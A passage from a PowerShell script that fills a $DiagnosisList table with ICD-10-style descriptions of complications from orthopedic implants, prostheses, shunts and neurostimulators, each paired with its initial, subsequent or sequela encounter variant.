fixation device of unspecified bone of limb","Other mechanical complication of internal fixation device of unspecified bone of limb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of unspecified bone of limb","Other mechanical complication of internal fixation device of unspecified bone of limb, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bones of hand and fingers","Breakdown (mechanical) of internal fixation device of bones of hand and fingers, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bones of hand and fingers","Breakdown (mechanical) of internal fixation device of bones of hand and fingers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bones of hand and fingers","Breakdown (mechanical) of internal fixation device of bones of hand and fingers, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bones of foot and toes","Breakdown (mechanical) of internal fixation device of bones of foot and toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bones of foot and toes","Breakdown (mechanical) of internal fixation device of bones of foot and toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of bones of foot and toes","Breakdown (mechanical) of internal fixation device of bones of foot and toes, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of vertebrae","Breakdown (mechanical) of internal fixation device of vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of vertebrae","Breakdown (mechanical) of internal fixation device of vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of vertebrae","Breakdown (mechanical) of internal fixation device of vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of other bones","Breakdown (mechanical) of internal fixation device of other bones, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of other bones","Breakdown (mechanical) of internal fixation device of other bones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of internal fixation device of other bones","Breakdown (mechanical) of internal fixation device of other bones, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bones of hand and fingers","Displacement of internal fixation device of bones of hand and fingers, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bones of hand and fingers","Displacement of internal fixation device of bones of hand and fingers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bones of hand and fingers","Displacement of internal fixation device of bones of hand and fingers, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bones of foot and toes","Displacement of internal fixation device of bones of foot and toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bones of foot and toes","Displacement of internal fixation device of bones of foot and toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of bones of foot and toes","Displacement of internal fixation device of bones of foot and toes, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of vertebrae","Displacement of internal fixation device of vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of vertebrae","Displacement of internal fixation device of vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of vertebrae","Displacement of internal fixation device of vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of other bones","Displacement of internal fixation device of other bones, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of other bones","Displacement of internal fixation device of other bones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of internal fixation device of other bones","Displacement of internal fixation device of other bones, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bones of hand and fingers","Other mechanical complication of internal fixation device of bones of hand and fingers, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bones of hand and fingers","Other mechanical complication of internal fixation device of bones of hand and fingers, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bones of hand and fingers","Other mechanical complication of internal fixation device of bones of hand and fingers, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bones of foot and toes","Other mechanical complication of internal fixation device of bones of foot and toes, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bones of foot and toes","Other mechanical complication of internal fixation device of bones of foot and toes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of bones of foot and toes","Other mechanical complication of internal fixation device of bones of foot and toes, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of vertebrae","Other mechanical complication of internal fixation device of vertebrae, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of vertebrae","Other mechanical complication of internal fixation device of vertebrae, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of vertebrae","Other mechanical complication of internal fixation device of vertebrae, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of other bones","Other mechanical complication of internal fixation device of other bones, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of other bones","Other mechanical complication of internal fixation device of other bones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of internal fixation device of other bones","Other mechanical complication of internal fixation device of other bones, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of electronic bone stimulator","Breakdown (mechanical) of electronic bone stimulator, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of electronic bone stimulator","Breakdown (mechanical) of electronic bone stimulator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of electronic bone stimulator","Breakdown (mechanical) of electronic bone stimulator, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other bone devices, implants and grafts","Breakdown (mechanical) of other bone devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other bone devices, implants and grafts","Breakdown (mechanical) of other bone devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other bone devices, implants and grafts","Breakdown (mechanical) of other bone devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of electronic bone stimulator","Displacement of electronic bone stimulator, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of electronic bone stimulator","Displacement of electronic bone stimulator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of electronic bone stimulator","Displacement of electronic bone stimulator, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other bone devices, implants and grafts","Displacement of other bone devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other bone devices, implants and grafts","Displacement of other bone devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other bone devices, implants and grafts","Displacement of other bone devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of electronic bone stimulator","Other mechanical complication of electronic bone stimulator, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of electronic bone stimulator","Other mechanical complication of electronic bone stimulator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of electronic bone stimulator","Other mechanical complication of electronic bone stimulator, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other bone devices, implants and grafts","Other mechanical complication of other bone devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other bone devices, implants and grafts","Other mechanical complication of other bone devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other bone devices, implants and grafts","Other mechanical complication of other bone devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of muscle and tendon graft","Breakdown (mechanical) of muscle and tendon graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of muscle and tendon graft","Breakdown (mechanical) of muscle and tendon graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of muscle and tendon graft","Breakdown (mechanical) of muscle and tendon graft, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other internal orthopedic devices, implants and grafts","Breakdown (mechanical) of other internal orthopedic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other internal orthopedic devices, implants and grafts","Breakdown (mechanical) of other internal orthopedic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other internal orthopedic devices, implants and grafts","Breakdown (mechanical) of other internal orthopedic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of muscle and tendon graft","Displacement of muscle and tendon graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of muscle and tendon graft","Displacement of muscle and tendon graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of muscle and tendon graft","Displacement of muscle and tendon graft, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other internal orthopedic devices, implants and grafts","Displacement of other internal orthopedic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other internal orthopedic devices, implants and grafts","Displacement of other internal orthopedic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other internal orthopedic devices, implants and grafts","Displacement of other internal orthopedic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of muscle and tendon graft","Other mechanical complication of muscle and tendon graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of muscle and tendon graft","Other mechanical complication of muscle and tendon graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of muscle and tendon graft","Other mechanical complication of muscle and tendon graft, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other internal orthopedic devices, implants and grafts","Other mechanical complication of other internal orthopedic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other internal orthopedic devices, implants and grafts","Other mechanical complication of other internal orthopedic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other internal orthopedic devices, implants and grafts","Other mechanical complication of other internal orthopedic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to unspecified internal joint prosthesis","Infection and inflammatory reaction due to unspecified internal joint prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to unspecified internal joint prosthesis","Infection and inflammatory reaction due to unspecified internal joint prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to unspecified internal joint prosthesis","Infection and inflammatory reaction due to unspecified internal joint prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal right hip prosthesis","Infection and inflammatory reaction due to internal right hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal right hip prosthesis","Infection and inflammatory reaction due to internal right hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal right hip prosthesis","Infection and inflammatory reaction due to internal right hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal left hip prosthesis","Infection and inflammatory reaction due to internal left hip prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal left hip prosthesis","Infection and inflammatory reaction due to internal left hip prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal left hip prosthesis","Infection and inflammatory reaction due to internal left hip prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal right knee prosthesis","Infection and inflammatory reaction due to internal right knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal right knee prosthesis","Infection and inflammatory reaction due to internal right knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal right knee prosthesis","Infection and inflammatory reaction due to internal right knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal left knee prosthesis","Infection and inflammatory reaction due to internal left knee prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal left knee prosthesis","Infection and inflammatory reaction due to internal left knee prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal left knee prosthesis","Infection and inflammatory reaction due to internal left knee prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal joint prosthesis","Infection and inflammatory reaction due to other internal joint prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal joint prosthesis","Infection and inflammatory reaction due to other internal joint prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal joint prosthesis","Infection and inflammatory reaction due to other internal joint prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified site","Infection and inflammatory reaction due to internal fixation device of unspecified site, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified site","Infection and inflammatory reaction due to internal fixation device of unspecified site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified site","Infection and inflammatory reaction due to internal fixation device of unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right humerus","Infection and inflammatory reaction due to internal fixation device of right humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right humerus","Infection and inflammatory reaction due to internal fixation device of right humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right humerus","Infection and inflammatory reaction due to internal fixation device of right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left humerus","Infection and inflammatory reaction due to internal fixation device of left humerus, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left humerus","Infection and inflammatory reaction due to internal fixation device of left humerus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left humerus","Infection and inflammatory reaction due to internal fixation device of left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right radius","Infection and inflammatory reaction due to internal fixation device of right radius, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right radius","Infection and inflammatory reaction due to internal fixation device of right radius, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right radius","Infection and inflammatory reaction due to internal fixation device of right radius, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left radius","Infection and inflammatory reaction due to internal fixation device of left radius, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left radius","Infection and inflammatory reaction due to internal fixation device of left radius, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left radius","Infection and inflammatory reaction due to internal fixation device of left radius, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right ulna","Infection and inflammatory reaction due to internal fixation device of right ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right ulna","Infection and inflammatory reaction due to internal fixation device of right ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right ulna","Infection and inflammatory reaction due to internal fixation device of right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left ulna","Infection and inflammatory reaction due to internal fixation device of left ulna, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left ulna","Infection and inflammatory reaction due to internal fixation device of left ulna, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left ulna","Infection and inflammatory reaction due to internal fixation device of left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified bone of arm","Infection and inflammatory reaction due to internal fixation device of unspecified bone of arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified bone of arm","Infection and inflammatory reaction due to internal fixation device of unspecified bone of arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified bone of arm","Infection and inflammatory reaction due to internal fixation device of unspecified bone of arm, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right femur","Infection and inflammatory reaction due to internal fixation device of right femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right femur","Infection and inflammatory reaction due to internal fixation device of right femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right femur","Infection and inflammatory reaction due to internal fixation device of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left femur","Infection and inflammatory reaction due to internal fixation device of left femur, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left femur","Infection and inflammatory reaction due to internal fixation device of left femur, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left femur","Infection and inflammatory reaction due to internal fixation device of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right tibia","Infection and inflammatory reaction due to internal fixation device of right tibia, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right tibia","Infection and inflammatory reaction due to internal fixation device of right tibia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right tibia","Infection and inflammatory reaction due to internal fixation device of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left tibia","Infection and inflammatory reaction due to internal fixation device of left tibia, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left tibia","Infection and inflammatory reaction due to internal fixation device of left tibia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left tibia","Infection and inflammatory reaction due to internal fixation device of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right fibula","Infection and inflammatory reaction due to internal fixation device of right fibula, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right fibula","Infection and inflammatory reaction due to internal fixation device of right fibula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of right fibula","Infection and inflammatory reaction due to internal fixation device of right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left fibula","Infection and inflammatory reaction due to internal fixation device of left fibula, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left fibula","Infection and inflammatory reaction due to internal fixation device of left fibula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of left fibula","Infection and inflammatory reaction due to internal fixation device of left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified bone of leg","Infection and inflammatory reaction due to internal fixation device of unspecified bone of leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified bone of leg","Infection and inflammatory reaction due to internal fixation device of unspecified bone of leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of unspecified bone of leg","Infection and inflammatory reaction due to internal fixation device of unspecified bone of leg, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of spine","Infection and inflammatory reaction due to internal fixation device of spine, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of spine","Infection and inflammatory reaction due to internal fixation device of spine, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of spine","Infection and inflammatory reaction due to internal fixation device of spine, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of other site","Infection and inflammatory reaction due to internal fixation device of other site, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of other site","Infection and inflammatory reaction due to internal fixation device of other site, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to internal fixation device of other site","Infection and inflammatory reaction due to internal fixation device of other site, sequela") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal orthopedic prosthetic devices, implants and grafts","Infection and inflammatory reaction due to other internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal orthopedic prosthetic devices, implants and grafts","Infection and inflammatory reaction due to other internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Infection and inflammatory reaction due to other internal orthopedic prosthetic devices, implants and grafts","Infection and inflammatory reaction due to other internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Embolism due to internal orthopedic prosthetic devices, implants and grafts","Embolism due to internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to internal orthopedic prosthetic devices, implants and grafts","Embolism due to internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Embolism due to internal orthopedic prosthetic devices, implants and grafts","Embolism due to internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Fibrosis due to internal orthopedic prosthetic devices, implants and grafts","Fibrosis due to internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to internal orthopedic prosthetic devices, implants and grafts","Fibrosis due to internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fibrosis due to internal orthopedic prosthetic devices, implants and grafts","Fibrosis due to internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to internal orthopedic prosthetic devices, implants and grafts","Hemorrhage due to internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to internal orthopedic prosthetic devices, implants and grafts","Hemorrhage due to internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hemorrhage due to internal orthopedic prosthetic devices, implants and grafts","Hemorrhage due to internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Pain due to internal orthopedic prosthetic devices, implants and grafts","Pain due to internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Pain due to internal orthopedic prosthetic devices, implants and grafts","Pain due to internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pain due to internal orthopedic prosthetic devices, implants and grafts","Pain due to internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Stenosis due to internal orthopedic prosthetic devices, implants and grafts","Stenosis due to internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to internal orthopedic prosthetic devices, implants and grafts","Stenosis due to internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Stenosis due to internal orthopedic prosthetic devices, implants and grafts","Stenosis due to internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Thrombosis due to internal orthopedic prosthetic devices, implants and grafts","Thrombosis due to internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to internal orthopedic prosthetic devices, implants and grafts","Thrombosis due to internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Thrombosis due to internal orthopedic prosthetic devices, implants and grafts","Thrombosis due to internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Other specified complication of internal orthopedic prosthetic devices, implants and grafts","Other specified complication of internal orthopedic prosthetic devices, implants and grafts, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of internal orthopedic prosthetic devices, implants and grafts","Other specified complication of internal orthopedic prosthetic devices, implants and grafts, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified complication of internal orthopedic prosthetic devices, implants and grafts","Other specified complication of internal orthopedic prosthetic devices, implants and grafts, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of internal orthopedic prosthetic device, implant and graft","Unspecified complication of internal orthopedic prosthetic device, implant and graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of internal orthopedic prosthetic device, implant and graft","Unspecified complication of internal orthopedic prosthetic device, implant and graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of internal orthopedic prosthetic device, implant and graft","Unspecified complication of internal orthopedic prosthetic device, implant and graft, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of ventricular intracranial (communicating) shunt","Breakdown (mechanical) of ventricular intracranial (communicating) shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of ventricular intracranial (communicating) shunt","Breakdown (mechanical) of ventricular intracranial (communicating) shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of ventricular intracranial (communicating) shunt","Breakdown (mechanical) of ventricular intracranial (communicating) shunt, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of ventricular intracranial (communicating) shunt","Displacement of ventricular intracranial (communicating) shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of ventricular intracranial (communicating) shunt","Displacement of ventricular intracranial (communicating) shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of ventricular intracranial (communicating) shunt","Displacement of ventricular intracranial (communicating) shunt, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of ventricular intracranial (communicating) shunt","Leakage of ventricular intracranial (communicating) shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of ventricular intracranial (communicating) shunt","Leakage of ventricular intracranial (communicating) shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of ventricular intracranial (communicating) shunt","Leakage of ventricular intracranial (communicating) shunt, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of ventricular intracranial (communicating) shunt","Other mechanical complication of ventricular intracranial (communicating) shunt, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of ventricular intracranial (communicating) shunt","Other mechanical complication of ventricular intracranial (communicating) shunt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of ventricular intracranial (communicating) shunt","Other mechanical complication of ventricular intracranial (communicating) shunt, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of brain electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of brain electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of brain electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of brain electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of brain electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of brain electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of peripheral nerve electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of peripheral nerve electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of peripheral nerve electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of peripheral nerve electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of spinal cord electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of spinal cord electrode (lead), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of spinal cord electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of spinal cord electrode (lead), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator of spinal cord electrode (lead)","Breakdown (mechanical) of implanted electronic neurostimulator of spinal cord electrode (lead), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator, generator","Breakdown (mechanical) of implanted electronic neurostimulator, generator, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator, generator","Breakdown (mechanical) of implanted electronic neurostimulator, generator, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of implanted electronic neurostimulator, generator","Breakdown (mechanical) of implanted electronic neurostimulator, generator, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other implanted electronic stimulator of nervous system","Breakdown 